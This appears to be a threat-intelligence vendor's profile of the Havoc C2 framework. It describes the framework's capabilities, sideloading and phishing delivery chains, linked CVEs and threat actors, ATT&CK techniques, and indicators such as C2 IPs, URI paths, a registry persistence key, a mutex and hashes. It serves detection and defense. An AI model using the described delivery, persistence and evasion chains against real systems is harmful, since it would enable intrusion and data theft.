Havoc
Havoc is an open-source post-exploitation command-and-control framework, also referred to as Havoc C2, that threat actors increasingly use as an alternative to Cobalt Strike, Sliver, and Brute Ratel. Its implant is commonly called Demon. Reported capabilities include HTTP/HTTPS and SMB-based C2, AES-encrypted check-ins, command execution via cmd.exe and PowerShell, file upload and download, screenshot capture, process and host enumeration, network enumeration, token impersonation, proxying, named-pipe communication, process injection using NtAllocateVirtualMemory and NtCreateThreadEx, DLL spawn/injection, and configurable sleep timing for evasion. Content also describes evasion features such as indirect syscalls, sleep obfuscation or Ekko sleep masking, AMSI/ETW patching, stack spoofing, and anti-forensic options in some observed builds.
Observed delivery and execution chains include phishing and ClickFix lures, ZIP archives containing decoy documents and malicious screen-saver files, DLL sideloading through trusted signed binaries, registry-backed staged configuration recovery, and software update abuse. In a Brazil-focused phishing campaign, a VBScript in a fake NF-e invoice ZIP downloaded an MSI from Google Cloud Storage that installed a legitimate Microsoft-signed mpextms.exe alongside a malicious endpointdlp.dll stager. That stager retrieved the Havoc Demon over the network, used a Microsoft-Delivery-Optimization/10.1 user-agent, contacted 194.59.31.192:8443 with GET /stage/<32-hex> and POST /api/v2/telemetry/diag, and persisted via HKCU\Environment\UserInitMprLogonScript pointing to mpextms.exe. Recovered stager configuration included GET /stage/, POST /api/v2/telemetry/diag, mutex Global{7f3a9c2e-4b1d-8e5f-a6d0-3c9b2e1f7a4d}, and strings including phantom.local and 0123456789abcdef. Recovered Demon configurations included C2 values such as 143.198.183.46, 194.62.55.81:80, and a private test address 192.168.12.228, with HTTP POST / or /api and a Chrome-like user-agent.
Havoc has also been observed in Microsoft Teams/Quick Assist social-engineering intrusions, where attackers used DLL sideloading with binaries such as ADNotificationManager.exe, AcroServicesUpdater2_x64.exe, DlpUserAgent.exe, and werfault.exe, with encrypted configuration stored in the registry and outbound HTTPS C2 over TCP 443. In multiple incidents, ADNotificationManager.exe sideloaded a Havoc payload named vcruntime140_1.dll, after which attackers used Rclone for exfiltration. Sophos reported Chinese state-directed Operation Crimson Palace deploying Havoc on compromised web application servers, including a malicious Havoc DLL injected into backgroundtaskhost.exe and later Havoc payloads delivered through multiple sideloading chains. Check Point reported Operation TrueChaos, in which attackers exploited TrueConf Client CVE-2026-3502 by replacing update packages on compromised on-premises TrueConf servers used by government entities in Southeast Asia; the malicious updates delivered Havoc for reconnaissance, persistence, surveillance, and C2. Check Point linked that campaign with moderate confidence to a China-aligned or Chinese-nexus actor. Sophos and CTU reporting also tie Havoc use to the financially motivated GOLD ENCOUNTER / PayoutsKing operation, which used DLL sideloading to launch Havoc and then exfiltrated data with WinSCP or Rclone.
Targeting described in the content includes government organizations, public-sector entities, Southeast Asian government networks, Brazilian organizations during tax season, and victims of ransomware or extortion intrusions. Specific artifacts mentioned include demon.x64.dll with SHA-256 ef73a528e37f30fd84d41763b7f62f972407ec5ad6754ed86576a3bebbc053a7 and MD5 0c883112be08398d5bbc686a933ac6bc, observed Havoc injection into C:\Windows\System32\Werfault.exe, and use of registry-backed encrypted configuration to survive reboots or remediation attempts.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system. | Attackers replaced update files with malicious ones, tricking users into installing them. This delivered the Havoc framework, enabling control, surveillance, and persistence.
Researchers at Sophos recently discovered that in mid-2025, Bronze Butler (a.k.a. Tick, RedBaldKnight, Stalker Panda, Swirl Typhoon) exploited a critical vulnerability in Lanscope when it was still a zero-day... Motex disclosed a vulnerability designated CVE-2025-61932... Motex has released a fix... CISA added CVE-2025-61932 to its Known Exploited Vulnerabilities (KEV) catalog.
Attack chains mounted by the adversary have been found to abuse CVE-2025-8088, a now-patched security flaw impacting RARLAB WinRAR that allows for arbitrary code execution when specially crafted archives are opened by targets. The exploitation of the vulnerability was observed about eight days after its public disclosure in August.
Groups observed using it
19 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH.
Havoc C2 for post-exploitation tasks like pivoting through compromised hosts into internal networks, privilege escalation, and maintaining stealth
The TrueChaos campaign has been found to weaponize this flaw in the update mechanism to likely deploy the open-source Havoc command-and-control (C2) framework to vulnerable endpoints.
The group uses a combination of living-off-the-land tools (like ligolo, socat, proxychains) and post-exploitation frameworks (like Havoc, MeshCentral, and custom C2 binaries) across Linux and cloud systems.
What once ended with a $300 gift card purchase now ends with a modified Havoc C2 framework burrowed into your environment... deploying a mix of custom Havoc Demon payloads...
"...used to execute the Havoc command-and-control (C2) framework."
The attack is also characterized by the deployment of the Havoc post-exploitation framework on select systems...
OceanLotus: TahirSec has published a report on a recent OceanLotus (APT32) phishing campaign that drops Havoc payloads.
KugelBlitz, a shellcode loader that's used to deploy the Havoc C2 framework
The final payload deployed as part of the attack is the open-source command-and-control (C2 or C&C) framework known as Havoc.
Lastly, some operators started experimenting with the Havoc C2 framework in March 2025, to supplement their tooling.
"...downloads and executes an additional payload, most commonly Havoc."
ShadowSyndicate continues to be associated with toolkits including Cobalt Strike, Metasploit, Havoc, Mythic, Sliver, AsyncRAT, MeshAgent, and Brute Ratel.
“The primary C2 frameworks observed were Cobalt Strike, VShell, Havoc, Sliver, and SparkRat.”
"Pakistani hackers used vibeware as a 'hybrid' fallback for well-known tools such as the open-source Havoc framework for command and control..."
Nearly half a dozen organizations have been targeted with the Havoc command-and-control framework for subsequent data theft or ransomware compromise in a new IT support scam campaign.
This evolution includes the use of the Rust programming language, a departure from previous reliance on traditional compiled languages and frameworks like Cobalt Strike and Havoc.
"...borrowed adversary simulation frameworks such as Cobalt Strike, Havoc..." and "...components associated with the Havoc post-exploitation C2 framework... Havoc shellcode payload..."
"...borrowed adversary simulation frameworks such as Cobalt Strike, Havoc..." and "...components associated with the Havoc post-exploitation C2 framework... Havoc shellcode payload..."
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
5 techniquesMost infections likely began through a link sent to the victims. The links launched the TrueConf client and showed an update prompt alleging that there is a newer version available.
CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
Havoc has also been employed in connection with a fraudulent npm module dubbed aabquerys that, once installed, triggers a three-stage process to retrieve the Demon implant.
The attack sequence documented by Zscaler begins with a ZIP archive that embeds a decoy document and a screen-saver file that's designed to download and launch the Havoc Demon agent on the infected host.
MITRE ATT&CK ID Technique T1566.002 Phishing: Spearphishing Link
Execution
9 techniquesthe injected process used WMIC to query Windows Defender exclusion paths... the attackers used a command shell session spawned from the malicious DLL to move laterally via WMIC
The atexec module was used to remotely configure a scheduled task on the targeted system... schtasks /create /tn \Microsoft\Windows\Clip2
Attackers replaced update files with malicious ones, tricking users into installing them. This delivered the Havoc framework, enabling control, surveillance, and persistence.
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
The VBS hides its intent behind string splitting. Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage with curl, runs it with msiexec /quiet /norestart, and deletes the file
the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation
CISA’s confirmation that the vulnerability is being exploited follows a report from cybersecurity researchers at Check Point outlining an alleged Chinese hacking campaign targeting governments in Southeast Asia. Check Point said Chinese hackers have been exploiting the vulnerability in a campaign they call TrueChaos.
The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.
Persistence
4 techniquesAt first execution, the stager writes: HKCU\Environment\UserInitMprLogonScript = <path to mpextms.exe>
The atexec module was used to remotely configure a scheduled task on the targeted system... schtasks /create /tn \Microsoft\Windows\Clip2
In this campaign, sideloaded modules acted as intermediary loaders that decrypted hidden configuration data stored inside the Windows registry rather than writing anything suspicious to disk.
Using previously stolen credentials, the attackers deployed a web shell to a web application server using its built-in file upload feature.
Privilege Escalation
3 techniquesAt first execution, the stager writes: HKCU\Environment\UserInitMprLogonScript = <path to mpextms.exe>
The atexec module was used to remotely configure a scheduled task on the targeted system... schtasks /create /tn \Microsoft\Windows\Clip2
Stealth
9 techniquesEncrypted C2 traffic. A fresh AES key is negotiated at first contact; all later traffic is encrypted.
allowing attacker-supplied modules to run under a trusted execution context from non-standard paths.
The MSI also has no digital signature ... Only mpextms.exe is signed. The stager DLL is not.
The next step is an MSI that pretends to be a Microsoft update ... Microsoft Endpoint DLP Module ... Inside the installer are two programs: mpextms.exe ... endpointdlp.dll ... Side by side, the MSI and DLL look like one Microsoft bundle.
using a custom malware loader called HUI loader to inject a Cobalt Strike beacon into the Remote Desktop utility mstsc.exe... attackers used the Havoc tool to inject code into other processes
The VBS hides its intent behind string splitting. Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage
Deobfuscated, the VBS launches a hidden cmd that downloads the MSI from Google Cloud Storage with curl, runs it with msiexec /quiet /norestart, and deletes the file
the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation
Defense Impairment
1 techniqueDiscovery
4 techniquesdeploy the open-source SharpHound tool for Active Directory infrastructure mapping
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation
Command and Control
5 techniquesT1071 Application Layer Protocol — Мимикрия C2 под HTTP/HTTPS/DNS
When we ran the DLL in a sandbox with internet access, the behavior matched exactly: it issued GET /stage/<32-hex> and then POST /api/v2/telemetry/diag against 194[.]59[.]31[.]192:8443, using the Microsoft-Delivery-Optimization/10.1 user-agent.
По MITRE ATT&CK это конкретные техники: Proxy ( T1090, Command and Control ) - маршрутизация C2-трафика через промежуточный узел
The DLL we recovered is just a stager: its only job is to reach out to the C2 server and download the demon over the network. The demon never exists on disk.
Cobalt Strike uses a command-line interface to interact with systems. Brute Ratel C4 can use cmd.exe for execution. Havoc can execute commands via cmd.exe. Covenant provides access to a Command Shell in Windows environments for follow-on command execution and tasking.
Exfiltration
1 techniqueExfiltration of data of intelligence value was still an objective after the resumption of activity.
IOCs tracked for this family
67 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
77 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source post-exploitation framework used here as the final in-memory implant ('demon'). The campaign uses a stager DLL masquerading as Microsoft Defender DLP to fetch Havoc over the network at runtime, enabling command execution, screen monitoring, persistence, encrypted C2, sleep masking, indirect syscalls, and AMSI/ETW patching.
Mentioned as an HTTP-based command-and-control framework whose network flow features can be disguised to evade ML-based IDS detection.
Command-and-control framework/implant discussed in the context of periodic beaconing and traffic shaping for evasion.
An intrusion/C2 framework associated here with registry-backed encrypted configuration storage and command-and-control activity over HTTPS, used to maintain covert access and execute malicious code via DLL side-loading.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.